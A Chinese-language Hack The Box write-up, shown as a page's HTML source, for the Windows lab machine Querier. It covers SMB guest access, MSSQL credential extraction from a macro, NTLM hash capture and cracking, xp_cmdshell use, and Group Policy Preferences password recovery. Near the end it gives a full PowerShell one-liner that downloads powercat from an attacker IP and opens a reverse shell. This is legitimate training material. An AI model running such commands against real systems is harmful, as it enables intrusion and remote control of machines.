-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathHTB-windows-querier.html
More file actions
397 lines (287 loc) · 22 KB
/
HTB-windows-querier.html
File metadata and controls
397 lines (287 loc) · 22 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.css" integrity="sha256-zM8WXtG4eUn7dKKNMTuoWZub++VnSfaOpA/8PJfvTBo=" crossorigin="anonymous">
<script class="next-config" data-name="main" type="application/json">{"hostname":"owefsad.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.23.1","exturl":false,"sidebar":{"position":"right","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>
<meta name="description" content="简介:querier是第二台windows靶机, 与第一台的风格完全不同, 这台靶机学到了很多windows下提权的思路和信息收集的工具. 该靶机的思路是:public share -> xlsm file -> mssql user -> mssql sa -> group policy preferences 靶机状态: 已完成。">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-Windows-Querier">
<meta property="og:url" content="https://owefsad.github.io/HTB-windows-querier.html">
<meta property="og:site_name" content="owefsad">
<meta property="og:description" content="简介:querier是第二台windows靶机, 与第一台的风格完全不同, 这台靶机学到了很多windows下提权的思路和信息收集的工具. 该靶机的思路是:public share -> xlsm file -> mssql user -> mssql sa -> group policy preferences 靶机状态: 已完成。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_nmap.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB-windows-querier-smb_guest.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB-windows-querier-smbserver-ntlmhash.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_hashcat.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_user_smbmap.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_usertxt.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_administrator.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_roottxt.png">
<meta property="og:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_reverse_shell.png">
<meta property="article:published_time" content="2019-04-18T16:26:20.000Z">
<meta property="article:modified_time" content="2025-06-21T08:45:38.105Z">
<meta property="article:author" content="owefsad">
<meta property="article:tag" content="privilege_escalation">
<meta property="article:tag" content="excel macros">
<meta property="article:tag" content="smb share">
<meta property="article:tag" content="MS-Sql">
<meta property="article:tag" content="ntlmhash">
<meta property="article:tag" content="Group Policy Preferences">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://owefsad.github.io/HTB-windows-querier/HTB_windows_querier_nmap.png">
<link rel="canonical" href="https://owefsad.github.io/HTB-windows-querier.html">
<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://owefsad.github.io/HTB-windows-querier.html","path":"HTB-windows-querier.html","title":"HTB-Windows-Querier"}</script>
<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>HTB-Windows-Querier | owefsad</title>
<script src="/js/third-party/analytics/baidu-analytics.js" defer></script>
<script async src="https://hm.baidu.com/hm.js?2a72b138b6ef81ae123fcd18e91fa843"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.umd.js" integrity="sha256-hiUEBwFEpLF6DlB8sGXlKo4kPZ46Ui4qGpd0vrVkOm4=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>
<script src="/js/third-party/fancybox.js" defer></script>
<noscript>
<link rel="stylesheet" href="/css/noscript.css">
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
<div class="headband"></div>
<main class="main">
<div class="column">
<header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="Toggle navigation bar" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<i class="logo-line"></i>
<p class="site-title">owefsad</p>
<i class="logo-line"></i>
</a>
<p class="site-subtitle" itemprop="description">owefsad page</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger" aria-label="Search" role="button">
</div>
</div>
</div>
<nav class="site-nav">
<ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-resume"><a href="/resume/" rel="section"><i class="fa fa-user fa-fw"></i>resume</a></li>
</ul>
</nav>
</header>
<aside class="sidebar">
<div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
<ul class="sidebar-nav">
<li class="sidebar-nav-toc">
Table of Contents
</li>
<li class="sidebar-nav-overview">
Overview
</li>
</ul>
<div class="sidebar-panel-container">
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
<div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B7%A5%E5%85%B7-Keys"><span class="nav-number">1.</span> <span class="nav-text">工具 && Keys</span></a></li></ol></div>
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
<p class="site-author-name" itemprop="name">owefsad</p>
<div class="site-description" itemprop="description">分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具</div>
</div>
<div class="site-state-wrap animated">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">93</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/">
<span class="site-state-item-count">6</span>
<span class="site-state-item-name">categories</span></a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">173</span>
<span class="site-state-item-name">tags</span></a>
</div>
</nav>
</div>
<div class="links-of-author animated">
<span class="links-of-author-item">
<a href="https://github.com/exexute" title="GitHub → https://github.com/exexute" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:1547147759@gmail.com" title="E-Mail → mailto:1547147759@gmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
</span>
</div>
</div>
</div>
</div>
</aside>
</div>
<div class="main-inner post posts-expand">
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
<link itemprop="mainEntityOfPage" href="https://owefsad.github.io/HTB-windows-querier.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="owefsad">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="owefsad">
<meta itemprop="description" content="分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具">
</span>
<span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
<meta itemprop="name" content="HTB-Windows-Querier | owefsad">
<meta itemprop="description" content="">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
HTB-Windows-Querier<a href="https://github.com/owefsad/blog/tree/main/source/_posts/HTB-windows-querier.md" class="post-edit-link" title="Edit this post" rel="noopener" target="_blank"><i class="fa fa-pen-nib"></i></a>
</h1>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2019-04-19 00:26:20" itemprop="dateCreated datePublished" datetime="2019-04-19T00:26:20+08:00">2019-04-19</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">In</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
</span>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody"><p>简介:<br>querier是第二台windows靶机, 与第一台的风格完全不同, 这台靶机学到了很多windows下提权的思路和信息收集的工具. 该靶机的思路是:<br>public share -> xlsm file -> mssql user -> mssql sa -> group policy preferences</p>
<p>靶机状态: 已完成。</p>
<span id="more"></span>
<blockquote>
<p>MSRPC、NetBIOS、SMB、MSSQL、WinRM</p>
</blockquote>
<p>拿到靶机先扫描一波tcp端口<code>./mnmap.sh 10.10.10.125 1000</code>, 扫完之后很懵逼, 没怎么打过windows靶机一时不知道怎么收集信息怎么深入到下一步了.<br><img src="/HTB-windows-querier/HTB_windows_querier_nmap.png" alt="HTB_windows_querier_nmap"></p>
<p>139端口为NetBIOS服务、445端口属于SMB服务、1433端口mssql服务、5985和47001端口为WinRM服务、135和49664-49671端口为MSRPC服务, 从1433端口的详细信息中找到<strong>主机名QUERIER</strong>、<strong>域HTB</strong>、<strong>DNS域HTB.LOCAL</strong>, 操作系统最有可能是xp、win7、Server2012。</p>
<blockquote>
<p>xlsm find account</p>
</blockquote>
<p>windows系统中默认存在一个<strong>guest</strong>账号, 使用smb工具连接smb服务的时候指定用户名为guest即可找到一个reports的共享目录, 目录中有一个xlsm文件.<br><img src="/HTB-windows-querier/HTB-windows-querier-smb_guest.png" alt="HTB-windows-querier-smb_guest"></p>
<p>xlsm文件为带宏的excel文件, 将xlsm文件复制为zip或rar文件然后解压, 可以在其中的xl目录下找到一个**.bin**的宏文件. </p>
<p>通过<strong>olevba</strong>对bin格式的vpa宏文件进行反编译, 查看宏代码及其中硬编码的mssql账号和密码:<code>reporting / PcwTWTHRwryjc$c6</code></p>
<blockquote>
<p>mssql stellar ntlm hash</p>
</blockquote>
<p>用<strong>mssql_client</strong>登陆sqlserver数据库, 发现这是一个低权限账号, 从数据库中搜索之后没有任何发现, 尝试之后通过<strong>xp_dirtree</strong>存储过程获取到运行mssql服务的用户的ntlm hash值, 用hashcat和rockyou.txt对ntlm hash进行爆破, 找到高权限账号密码<code>mssql-svc / corporate568</code><br><img src="/HTB-windows-querier/HTB-windows-querier-smbserver-ntlmhash.png" alt="HTB-windows-querier-smbserver-ntlmhash"><br><img src="/HTB-windows-querier/HTB_windows_querier_hashcat.png" alt="HTB_windows_querier_hashcat"></p>
<blockquote>
<p>mssql find user.txt and root.txt</p>
</blockquote>
<p>用mssql-svc账号登陆mssql后, 开启xp_cmdshell, 用xp_cmdshell读取mssql-svc账号桌面下的user.txt<br><img src="/HTB-windows-querier/HTB_windows_querier_user_smbmap.png" alt="HTB_windows_querier_user_smbmap"></p>
<p>由于对mssql的不熟悉, 执行xp_cmdshell的时候发现无法直接用<code>type <full path></code>读取文件, 因此通过连接符来读取<br><img src="/HTB-windows-querier/HTB_windows_querier_usertxt.png" alt="HTB_windows_querier_usertxt"></p>
<p>然后经过windows提权的各种ps脚本一通乱跑, 从<strong>组策略首选项</strong>的历史文件<strong>groups.xml</strong>中找到administrator的账号和加密后的密码。拿到账号密码之后尝试用ps运行子进程来读取root.txt但都以失败而告终, 不知道卡在来什么地方。<br>通过smbmap查看账号对共享目录的操作权限, 用smbclient登陆administrator账号, 下载root.txt并读取<br><img src="/HTB-windows-querier/HTB_windows_querier_administrator.png" alt="HTB_windows_querier_administrator"></p>
<p>root.txt<br><img src="/HTB-windows-querier/HTB_windows_querier_roottxt.png" alt="HTB_windows_querier_roottxt"></p>
<p>由于论坛上由大佬提出无法获取reverse shell, 于是尝试来一下, 用<code>xp_cmdshell powershell -noprofile IEX(New-Object System.Net.Webclient).DownloadString(\"http://10.10.15.77/powercat.ps1\");powercat -c 10.10.15.77 -p 2145 -e powershell</code>即可获取powershell反弹shell<br><img src="/HTB-windows-querier/HTB_windows_querier_reverse_shell.png" alt="HTB_windows_querier_reverse_shell"></p>
<h2 id="工具-Keys"><a href="#工具-Keys" class="headerlink" title="工具 && Keys"></a>工具 && Keys</h2><p>完成本靶机使用的工具:<br><a target="_blank" rel="noopener" href="https://github.com/ShawnDEvans/smbmap">smbmap</a><br>smbclient<br><a target="_blank" rel="noopener" href="https://github.com/decalage2/oletools/blob/master/oletools/olevba.py">olevba</a><br><a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket">mssqlclient</a><br><a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket">msbserver</a><br><a target="_blank" rel="noopener" href="https://github.com/hashcat/hashcat">hashcat</a><br><a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1">powerup</a><br><a target="_blank" rel="noopener" href="https://github.com/besimorhino/powercat">powercat</a></p>
<p>在用工具完成靶机的过程中, 遇到了很多问题:<br>1.smbmap和smbclient已知无法连接, 经排查是网络问题, 重启vpn、多运行几次工具即可<br>2.拿到账号后无法用mssqlclient登陆数据库, 经过尝试发现遇到的问题是reporting密码中含有的<code>$</code>为shell关键字, 用于获取变量, 可通过转义字符<code>\</code>进行转义或在弹出输入密码的提示框后输入; mssql的认证方式有用户认证和windows账号认证两种, 由于reporting账号是windows账号, 因此需要增加参数**-windows-auth<strong>进行登陆或指定主机名</strong>querier/reporting**进行登陆, 后者在mssql客户端工具上经过尝试可行, 未在mssqlclient上进行尝试<br>3.hashcat破解ntlm hash之后的密码写入原ntlm hash文件的末尾</p>
<p>关于更多windows下渗透的工具, 请参考<strong>Pentesting test in windows</strong></p>
</div>
<footer class="post-footer">
<div class="followme">
<span>Welcome to my other publishing channels</span>
<div class="social-list">
<div class="social-item">
<span class="social-link">
<span class="icon">
<i class="fab fa-weixin"></i>
</span>
<span class="label">WeChat</span>
</span>
<img class="social-item-img" src="/uploads/wechat-qcode.jpg">
</div>
<div class="social-item">
<a target="_blank" class="social-link" href="/uploads/avatar.gif">
<span class="icon">
<i class="fab fa-qq"></i>
</span>
<span class="label">QQ</span>
</a>
</div>
</div>
</div>
<div class="post-tags">
<a href="/tags/privilege-escalation/" rel="tag"># privilege_escalation</a>
<a href="/tags/excel-macros/" rel="tag"># excel macros</a>
<a href="/tags/smb-share/" rel="tag"># smb share</a>
<a href="/tags/MS-Sql/" rel="tag"># MS-Sql</a>
<a href="/tags/ntlmhash/" rel="tag"># ntlmhash</a>
<a href="/tags/Group-Policy-Preferences/" rel="tag"># Group Policy Preferences</a>
</div>
<div class="post-nav">
<div class="post-nav-item">
<a href="/HTB-linux-chaos.html" rel="prev" title="HTB-Linux-Chaos">
<i class="fa fa-angle-left"></i> HTB-Linux-Chaos
</a>
</div>
<div class="post-nav-item">
<a href="/HTB-windows-Netmon.html" rel="next" title="HTB_windows_Netmon">
HTB_windows_Netmon <i class="fa fa-angle-right"></i>
</a>
</div>
</div>
</footer>
</article>
</div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
© 2017 –
<span itemprop="copyrightYear">2025</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">owefsad</span>
</div>
</div>
</footer>
<div class="toggle sidebar-toggle" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
<div class="sidebar-dimmer"></div>
<div class="back-to-top" role="button" aria-label="Back to top">
<i class="fa fa-arrow-up fa-lg"></i>
<span>0%</span>
</div>
<a href="https://github.com/exexute" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>
<noscript>
<div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
</body>
</html>